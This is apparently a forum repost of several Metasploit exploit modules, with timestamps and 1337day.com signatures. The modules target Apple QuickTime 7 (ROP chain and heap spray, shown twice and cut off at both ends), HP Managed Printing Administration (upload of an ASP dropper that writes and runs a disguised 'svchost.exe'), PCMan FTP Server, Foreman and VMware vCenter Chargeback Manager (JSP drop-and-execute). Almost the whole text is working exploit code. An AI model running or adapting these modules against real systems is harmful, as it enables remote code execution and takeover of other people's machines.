      0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
    ].pack("V*")
 
    p << rop
    p << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
    p << payload.encoded
 
    p
  end
 
 
  def targetable?(agent)
    if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/
      return true
    elsif agent =~ /contype/
      # contype: a mov file request from Apple Quicktime
      return true
    end
 
    false
  end
 
 
  def get_html(t)
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
    fake_mov_name = rand_text_alpha(4) + ".mov"
    html = %Q|
    <html>
    <head>
    <script>
    #{js_property_spray}
 
    var s = unescape("#{js_p}");
    sprayHeap({shellcode:s});
    </script>
    </head>
    <body>
    <embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>
    </body>
    </html>
    |
 
    html.gsub(/^\t\t/, '')
  end
 
 
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    print_status("Requesting: #{request.uri}")
 
    unless targetable?(agent)
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end
 
    print_status("Target selected as: #{target.name}") if target
 
    if request.uri =~ /\.mov$/
      print_status("Sending specially crafted .mov file")
      send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })
    else
      html = get_html(target)
      send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
    end
  end
 
  def sort_bytes(data)
    data.map { |e| [e].pack('N').scan(/../).reverse.join }.join
  end
 
  def rop_nop(t)
    [t['Nop']].pack('V*')                    # Ret (QuickTime.qts)
  end
 
  def exploit
    buf = ''
    buf << rand_text_alpha(467)              # 467 to align the pivot
    10.times {
      buf << rop_nop(target)
    }
    buf << [
      target['Pop'],                       # POP ESP; RET (QuickTime.qts)
      0x20302020                           # Target value for ESP (our ROP payload)
    ].pack('V*')
    buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler
    buf << sort_bytes([target.ret])          # ADD ESP,280; RET (QuickTime.qts) - pivot
    buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size
 
    # Quicktime File Format Specifications:
    # https://developer.apple.com/standards/qtff-2001.pdf
    mov  = "\x00\x00\x06\xDF"                # File size
    mov << "moov"                            # Movie atom
    mov << "\x00\x00\x06\xD7"                # size (1751d)
    mov << "rmra"                            # Reference Movie atom
    mov << "\x00\x00\x06\xCF"                # size (1743d)
    mov << "rmda"                            # rmda atom
    mov << "\x00\x00\x06\xBF"                # size (1727d)
    mov << "rdrf"                            # Data reference atom
    mov << "\x00\x00\x00\x00"                # size set to 0
    mov << "alis"                            # Data reference type: FS alias record
    mov << "\x00\x00\x06\xAA"                # Size (1706d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00\x06\x61"                # Size (1633d)
    mov << rand_text_alpha(38)
    mov << "\x12"
    mov << rand_text_alpha(81)
    mov << "\xFF\xFF"
    mov << rand_text_alpha(18)
    mov << "\x00\x08"                        # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x08"                        # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x26"                        # Size (38d)
    mov << rand_text_alpha(38)
    mov << "\x00\x0F\x00\x0E"
    mov << "AA"                              # Size (must be invalid)
    mov << rand_text_alpha(12)
    mov << "\x00\x12\x00\x21"
    mov << rand_text_alpha(36)
    mov << "\x00"
    mov << "\x0F\x33"
    mov << rand_text_alpha(17)
    mov << "\x02\xF4"                        # Size (756h)
    mov << rand_text_alpha(756)
    mov << "\xFF\xFF\x00\x00\x00"
    mov << buf
 
    @exploit = mov
    super
  end
end
 
# 46CEA6543519698F   1337day.com [2013-07-19]   8F0F11E05192906A #

Добавлено в [time]1374241057[/time]
HP Managed Printing Administration jobAcct Remote Command Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
 
  def initialize
    super(
      'Name'        => 'HP Managed Printing Administration jobAcct Remote Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability on HP Managed Printing
        Administration 2.6.3 (and before). The vulnerability exists in the UploadFiles()
        function from the MPAUploader.Uploader.1 control, loaded and used by the server.
        The function can be abused via directory traversal and null byte injection in order
        to achieve arbitrary file upload.  In order to exploit successfully, a few conditions
        must be met: 1) A writable location under the context of Internet Guest Account
        (IUSR_*), or Everyone is required. By default, this module will attempt to write to
        /hpmpa/userfiles/, but you may specify the WRITEWEBFOLDER datastore option to provide
        another writable path. 2)  The writable path must also be readable by a browser,
        this typically means a location under wwwroot. 3) You cannot overwrite a file with
        the same name as the payload.
      },
      'Author'      => [
        'Andrea Micalizzi', # aka rgod - Vulnerability Discovery
        'juan vazquez' # Metasploit module
      ],
      'Platform'    => 'win',
      'References'  =>
        [
          ['CVE', '2011-4166'],
          ['OSVDB', '78015'],
          ['BID', '51174'],
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-352/'],
          ['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469']
        ],
      'Targets'     =>
        [
          [ 'HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]', { } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 21 2011'
    )
 
    register_options(
      [
        OptString.new('WRITEWEBFOLDER', [ false,  "Additional Web location with file write permissions for IUSR_*" ])
      ], self.class)
  end
 
  def peer
    return "#{rhost}:#{rport}"
  end
 
  def webfolder_uri
    begin
      u = datastore['WRITEWEBFOLDER']
      u = "/" if u.nil? or u.empty?
      URI(u).to_s
    rescue ::URI::InvalidURIError
      print_error "Invalid URI: #{datastore['WRITEWEBFOLDER'].inspect}"
      return "/"
    end
  end
 
  def to_exe_asp(exes = '')
 
    var_func    = Rex::Text.rand_text_alpha(rand(8)+8)
    var_stream  = Rex::Text.rand_text_alpha(rand(8)+8)
    var_obj     = Rex::Text.rand_text_alpha(rand(8)+8)
    var_shell   = Rex::Text.rand_text_alpha(rand(8)+8)
    var_tempdir = Rex::Text.rand_text_alpha(rand(8)+8)
    var_tempexe = Rex::Text.rand_text_alpha(rand(8)+8)
    var_basedir = Rex::Text.rand_text_alpha(rand(8)+8)
 
    var_f64name   = Rex::Text.rand_text_alpha(rand(8)+8)
    arg_b64string = Rex::Text.rand_text_alpha(rand(8)+8)
    var_length    = Rex::Text.rand_text_alpha(rand(8)+8)
    var_out       = Rex::Text.rand_text_alpha(rand(8)+8)
    var_group     = Rex::Text.rand_text_alpha(rand(8)+8)
    var_bytes     = Rex::Text.rand_text_alpha(rand(8)+8)
    var_counter   = Rex::Text.rand_text_alpha(rand(8)+8)
    var_char      = Rex::Text.rand_text_alpha(rand(8)+8)
    var_thisdata  = Rex::Text.rand_text_alpha(rand(8)+8)
    const_base64  = Rex::Text.rand_text_alpha(rand(8)+8)
    var_ngroup    = Rex::Text.rand_text_alpha(rand(8)+8)
    var_pout      = Rex::Text.rand_text_alpha(rand(8)+8)
 
    vbs = "<%\r\n"
 
    # ASP Base64 decode from Antonin Foller http://www.motobit.com/tips/detpg_base64/
    vbs << "Function #{var_f64name}(ByVal #{arg_b64string})\r\n"
    vbs << "Const #{const_base64} = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n"
    vbs << "Dim #{var_length}, #{var_out}, #{var_group}\r\n"
    vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbCrLf, \"\")\r\n"
    vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbTab, \"\")\r\n"
    vbs << "#{arg_b64string} = Replace(#{arg_b64string}, \" \", \"\")\r\n"
    vbs << "#{var_length} = Len(#{arg_b64string})\r\n"
    vbs << "If #{var_length} Mod 4 <> 0 Then\r\n"
    vbs << "Exit Function\r\n"
    vbs << "End If\r\n"
    vbs << "For #{var_group} = 1 To #{var_length} Step 4\r\n"
    vbs << "Dim #{var_bytes}, #{var_counter}, #{var_char}, #{var_thisdata}, #{var_ngroup}, #{var_pout}\r\n"
    vbs << "#{var_bytes} = 3\r\n"
    vbs << "#{var_ngroup} = 0\r\n"
    vbs << "For #{var_counter} = 0 To 3\r\n"
    vbs << "#{var_char} = Mid(#{arg_b64string}, #{var_group} + #{var_counter}, 1)\r\n"
    vbs << "If #{var_char} = \"=\" Then\r\n"
    vbs << "#{var_bytes} = #{var_bytes} - 1\r\n"
    vbs << "#{var_thisdata} = 0\r\n"
    vbs << "Else\r\n"
    vbs << "#{var_thisdata} = InStr(1, #{const_base64}, #{var_char}, vbBinaryCompare) - 1\r\n"
    vbs << "End If\r\n"
    vbs << "If #{var_thisdata} = -1 Then\r\n"
    vbs << "Exit Function\r\n"
    vbs << "End If\r\n"
    vbs << "#{var_ngroup} = 64 * #{var_ngroup} + #{var_thisdata}\r\n"
    vbs << "Next\r\n"
    vbs << "#{var_ngroup} = Hex(#{var_ngroup})\r\n"
    vbs << "#{var_ngroup} = String(6 - Len(#{var_ngroup}), \"0\") & #{var_ngroup}\r\n"
    vbs << "#{var_pout} = Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 1, 2))) + _\r\n"
    vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 3, 2))) + _\r\n"
    vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 5, 2)))\r\n"
    vbs << "#{var_out} = #{var_out} & Left(#{var_pout}, #{var_bytes})\r\n"
    vbs << "Next\r\n"
    vbs << "#{var_f64name} = #{var_out}\r\n"
    vbs << "End Function\r\n"
 
    vbs << "Sub #{var_func}()\r\n"
    vbs << "#{var_bytes} = #{var_f64name}(\"#{Rex::Text.encode_base64(exes)}\")\r\n"
    vbs << "Dim #{var_obj}\r\n"
    vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
    vbs << "Dim #{var_stream}\r\n"
    vbs << "Dim #{var_tempdir}\r\n"
    vbs << "Dim #{var_tempexe}\r\n"
    vbs << "Dim #{var_basedir}\r\n"
    vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n"
 
    vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n"
    vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"
    vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"
    vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n"
    vbs << "#{var_stream}.Write #{var_bytes}\r\n"
    vbs << "#{var_stream}.Close\r\n"
    vbs << "Dim #{var_shell}\r\n"
    vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"
 
    vbs << "#{var_shell}.run #{var_tempexe}, 0, false\r\n"
    vbs << "End Sub\r\n"
 
    vbs << "#{var_func}\r\n"
    vbs << "%>\r\n"
    vbs
  end
 
  def upload(contents, location)
    post_data = Rex::MIME::Message.new
    post_data.add_part("upload", nil, nil, "form-data; name=\"upload\"")
    post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"..\\../../wwwroot#{location}\x00.tmp\"")
    data = post_data.to_s
    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
 
    res = send_request_cgi({
      'uri'      => normalize_uri("hpmpa", "jobAcct", "Default.asp"),
      'method'   => 'POST',
      'ctype'    => "multipart/form-data; boundary=#{post_data.bound}",
      'data'     => data,
      'encode_params' => false,
      'vars_get' => {
        'userId' => rand_text_numeric(2+rand(2)),
        'jobId'  => rand_text_numeric(2+rand(2))
        }
      })
    return res
  end
 
  def check
    res = send_request_cgi({'uri' => normalize_uri("hpmpa", "home", "Default.asp")})
    version = nil
    if res and res.code == 200 and res.body =~ /HP Managed Printing Administration/ and res.body =~ /<dd>v(.*)<\/dd>/
      version = $1
    else
      return Exploit::CheckCode::Safe
    end
 
    vprint_status("HP MPA Version Detected: #{version}")
 
    if version <= "2.6.3"
      return Exploit::CheckCode::Appears
    end
 
    return Exploit::CheckCode::Safe
 
  end
 
  def exploit
    # Generate the ASP containing the EXE containing the payload
    exe = generate_payload_exe
    # Not using Msf::Util::EXE.to_exe_asp because the generated vbs is too long and the app complains
    asp = to_exe_asp(exe)
 
    #
    # UPLOAD
    #
    asp_name = "#{rand_text_alpha(5+rand(3))}.asp"
    locations = [
      "/hpmpa/userfiles/images/printers/",
      "/hpmpa/userfiles/images/backgrounds/",
      "/hpmpa/userfiles/images/",
      "/hpmpa/userfiles/",
      "/"
    ]
 
    locations << normalize_uri(webfolder_uri, asp_name) if datastore['WRITEWEBFOLDER']
 
    payload_url = ""
 
    locations.each {|location|
      asp_location = location + asp_name
      print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...")
      res = upload(asp, asp_location)
      if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/
        print_good("#{peer} - ASP Payload successfully wrote to #{location}")
        payload_url = asp_location
        break
      elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/
        print_error("#{peer} - Error probably due to permissions while writing to #{location}")
      else
        print_error("#{peer} - Unknown error while while writing to #{location}")
      end
    }
 
    if payload_url.empty?
      fail_with(Exploit::Failure::NotVulnerable, "#{peer} - Failed to upload ASP payload to the target")
    end
 
    #
    # EXECUTE
    #
    print_status("#{peer} - Executing payload through #{payload_url}...")
    send_request_cgi({ 'uri' => payload_url})
  end
 
end
 
# 02CCCDC0CCDF7057   1337day.com [2013-07-19]   38E66029F13E1436 #

 

[DarckSol]

PCMan FTP Server 2.0.7 - Remote Exploit (msf)

require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking
  
    include Msf::Exploit::Remote::Ftp
  
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'PCMan\'s FTPD V2.0.7 Username Overflow',
            'Description'    => %q{
                    This module exploits a buffer overflow found in the USER command
                of PCMan's FTPD.
            },
            'Author'         => 'MSJ <matt.jones.85[at]gmail.com>',
            'License'        => MSF_LICENSE,
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread'
                },
            'Payload'        =>
                {
                    'Space'    => 2005,
                    'BadChars' => "\x53\x93\x42\x7E",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    # Target 0
                    [
                        'Windows XP SP3 English',
                        {
                            'Ret'      => 0x7e429353 # push esp, ret
                        }
                    ]
                ],
            'Default Target' => 0))
    end
  
    def check
        connect
        disconnect
  
        if (banner =~ /220 PCMan\'s FTP Server 2\.0 Ready\./)
            return Exploit::CheckCode::Vulnerable
        end
            return Exploit::CheckCode::Safe
    end
  
    def exploit
        connect
  
        print_status("Trying target #{target.name}...")
  
        sploit = 'USER ' + "\x41" * 2005 + [target.ret].pack('V') + make_nops(16) + payload.encoded
          
        send_cmd( [sploit] , false )
  
        handler
        disconnect
    end
  
end
 
# 31B58018D63DC4A2   1337day.com [2013-07-23]   000658668D8AAF12 #

Добавлено в [time]1374566284[/time]
Foreman (Red Hat OpenStack/Satellite) Code Injection Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize
    super(
      'Name'           => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',
      'Description'    => %q{
          This module exploits a code injection vulnerability in the 'create'
        action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite
        (Foreman 1.2.0-RC1 and earlier).
      },
      'Author'         => 'Ramon de C Valle',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-2121'],
          ['CWE', '95'],
          ['OSVDB', '94671'],
          ['BID', '60833'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],
          ['URL', 'http://projects.theforeman.org/issues/2631']
        ],
      'Platform'       => 'ruby',
      'Arch'           => ARCH_RUBY,
      'Privileged'     => false,
      'Targets'        =>
        [
          ['Automatic', {}]
        ],
      'DisclosureDate' => 'Jun 6 2013',
      'DefaultOptions' => { 'PrependFork' => true },
      'DefaultTarget' => 0
    )
 
    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('USERNAME', [true, 'Your username', 'admin']),
        OptString.new('PASSWORD', [true, 'Your password', 'changeme']),
        OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
      ], self.class
    )
  end
 
  def exploit
    print_status("Logging into #{target_url}...")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'users', 'login'),
      'vars_post' => {
        'login[login]'    => datastore['USERNAME'],
        'login[password]' => datastore['PASSWORD']
      }
    )
 
    fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?
 
    if res.headers['Location'] =~ /users\/login$/
      fail_with(Exploit::Failure::NoAccess, 'Authentication failed')
    else
      session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
      fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?
    end
 
    print_status('Retrieving the CSRF token for this session...')
    res = send_request_cgi(
      'cookie' => "_session_id=#{session}",
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri)
    )
 
    fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?
 
    if res.headers['Location'] =~ /users\/login$/
      fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')
    else
      csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i
      csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i
 
      if csrf_param.nil? || csrf_token.nil?
        csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i
        csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i
      end
 
      fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?
    end
 
    payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)
 
    print_status("Sending create-bookmark request to #{target_url('bookmarks')}...")
    res = send_request_cgi(
      'cookie'    => "_session_id=#{session}",
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'bookmarks'),
      'vars_post' => {
        csrf_param             => csrf_token,
        payload_param          => payload.encoded,
        'bookmark[controller]' => "eval(params[:#{payload_param}])#",
        'bookmark[name]'       => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
        'bookmark[query]'      => Rex::Text.rand_text_alpha_lower(rand(9) + 3)
      }
    )
  end
 
  def target_url(*args)
    (ssl ? 'https' : 'http') +
      if rport.to_i == 80 || rport.to_i == 443
        "://#{vhost}"
      else
        "://#{vhost}:#{rport}"
      end + normalize_uri(target_uri.path, *args)
  end
end
 
# 179D383F17A3620C   1337day.com [2013-07-23]   68E2FCE4C80E6402 #

Добавлено в [time]1374566321[/time]
VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  HttpFingerprint = { :pattern => [ /Apache.*Win32/ ] }
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload',
      'Description' => %q{
        This module exploits a code execution flaw in VMware vCenter Chargeback Manager,
        where the ImageUploadServlet servlet allows unauthenticated file upload. The files
        are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed.
        The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1
        on Windows 2003 SP2.
      },
      'Author'       =>
        [
          'Andrea Micalizzi', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2013-3520' ],
          [ 'OSVDB', '94188' ],
          [ 'BID', '60484' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-147/' ]
        ],
      'Privileged'  => true,
      'Platform'    => 'win',
      'Arch' => ARCH_X86,
      'Targets'     =>
        [
          [ 'VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2', { } ]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 15 2013'))
 
    register_options(
      [
        Opt::RPORT(443)
      ], self.class)
  end
 
  #
  # Try to find and delete the jsp if we get a meterpreter.
  #
  def on_new_session(cli)
 
    if not @dropper or @dropper.empty?
      return
    end
 
    if cli.type != 'meterpreter'
      print_error("#{@peer} - Meterpreter not used. Please manually remove #{@dropper}")
      return
    end
 
    cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
 
    begin
      print_status("#{@peer} - Searching: #{@dropper}")
      files = cli.fs.file.search("\\", @dropper)
      if not files or files.empty?
        print_error("#{@peer} - Unable to find #{@dropper}. Please manually remove it.")
        return
      end
 
      files.each { |f|
        print_warning("Deleting: #{f['path'] + "\\" + f['name']}")
        cli.fs.file.rm(f['path'] + "\\" + f['name'])
      }
      print_good("#{@peer} - #{@dropper} deleted")
      return
    rescue ::Exception => e
      print_error("#{@peer} - Unable to delete #{@dropper}: #{e.message}")
    end
  end
 
  def upload_file(filename, contents)
    post_data = Rex::MIME::Message.new
    post_data.add_part(contents, "image/png", nil, "form-data; name=\"#{rand_text_alpha(4+rand(4))}\"; filename=\"#{filename}\"")
 
    # Work around an incompatible MIME implementation
    data = post_data.to_s
    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
 
    res = send_request_cgi(
    {
      'uri'     => normalize_uri("cbmui",  "ImageUploadServlet"),
      'method'  => 'POST',
      'data'    => data,
      'ctype'   => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie'  => "JSESSIONID=#{@session}"
    })
 
    if res and res.code == 200
      return true
    else
      return false
    end
  end
 
  def check
    res = send_request_cgi({
      'uri' => normalize_uri("cbmui", "en_US", "themes", "excel", "index.htm"),
    })
 
    if res and res.code == 200 and res.body =~ /vCenter Chargeback Manager/
      return Exploit::CheckCode::Detected
    end
 
    return Exploit::CheckCode::Safe
  end
 
  def exploit
    @peer = "#{rhost}:#{rport}"
 
    print_status("#{@peer} - Uploading JSP to execute the payload")
 
    exe = payload.encoded_exe
    exe_filename = rand_text_alpha(8) + ".exe"
 
    # The JSP dropper is needed because there isn't directory traversal, just
    # arbitrary file upload to a web path where JSP code execution is allowed.
    dropper = jsp_drop_and_execute(exe, exe_filename)
    dropper_filename = rand_text_alpha(8) + ".jsp"
 
    if upload_file(dropper_filename, dropper)
      register_files_for_cleanup(exe_filename)
      @dropper = dropper_filename
    else
      fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP upload failed")
    end
 
    print_status("#{@peer} - Executing payload")
    send_request_cgi(
    {
      'uri'    => normalize_uri("cbmui", "images", dropper_filename),
      'method' => 'GET'
    })
  end
 
  # This should probably go in a mixin
  def jsp_drop_bin(bin_data, output_file)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
 
    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
 
    jspraw << %Q|int numbytes = data.length();\n|
 
    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
    jspraw << %Q|{\n|
    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
    jspraw << %Q|  comb <<= 4;\n|
    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
    jspraw << %Q|}\n|
 
    jspraw << %Q|outputstream.write(bytes);\n|
    jspraw << %Q|outputstream.close();\n|
    jspraw << %Q|%>\n|
 
    jspraw
  end
 
  def jsp_execute_command(command)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|try {\n|
    jspraw << %Q|  Runtime.getRuntime().exec("chmod +x #{command}");\n|
    jspraw << %Q|} catch (IOException ioe) { }\n|
    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
    jspraw << %Q|%>\n|
 
    jspraw
  end
 
  def jsp_drop_and_execute(bin_data, output_file)
    jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
  end
 
end

Добавлено в [time]1374566366[/time]
Apple Quicktime 7 Invalid Atom Length Buffer Overflow

require 'msf/core'
  
class Metasploit4 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::HttpServer::HTML
  
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
      'Description'    => %q{
        This module exploits a vulnerability found in Apple Quicktime. The flaw is
        triggered when Quicktime fails to properly handle the data length for certain
        atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
        overflow by loading a specially crafted .mov file, and allows arbitrary
        code execution under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor
          'Tom Gallagher', # Original Discovery (overlapped)
          'Paul Bates',    # Original Discovery (overlapped)
          'sinn3r'         # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1017' ],
          [ 'BID', '60097' ],
          [ 'URL', 'http://support.apple.com/kb/HT5770' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          # All of the following addresses are from Quicktime.qts
          # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET
          [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],
          [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],
          [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],
          [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00"  # js_property_spray no like nilz
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Privileged'     => false,
      'DisclosureDate' => "May 22 2013"
    ))
  end
  
  def get_payload(t)
    p    = ''
  
    rop =
    [
      0x77c1e844, # POP EBP # RETN [msvcrt.dll]
      0x77c1e844, # skip 4 bytes [msvcrt.dll]
      0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
      0xffffffff,
      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
      0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
      0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
      0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
      0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
      0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
      0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
      0x77c3048a, # POP EDI # RETN [msvcrt.dll]
      0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
      0x77c46efb, # POP ESI # RETN [msvcrt.dll]
      0x77c2aacc, # JMP [EAX] [msvcrt.dll]
      0x77c3b860, # POP EAX # RETN [msvcrt.dll]
      0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
      0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
      0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
    ].pack("V*")
  
    p << rop
    p << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
    p << payload.encoded
  
    p
  end
  
  
  def targetable?(agent)
    if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/
      return true
    elsif agent =~ /contype/
      # contype: a mov file request from Apple Quicktime
      return true
    end
  
    false
  end
  
  
  def get_html(t)
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
    fake_mov_name = rand_text_alpha(4) + ".mov"
    html = %Q|
    <html>
    <head>
    <script>
    #{js_property_spray}
  
    var s = unescape("#{js_p}");
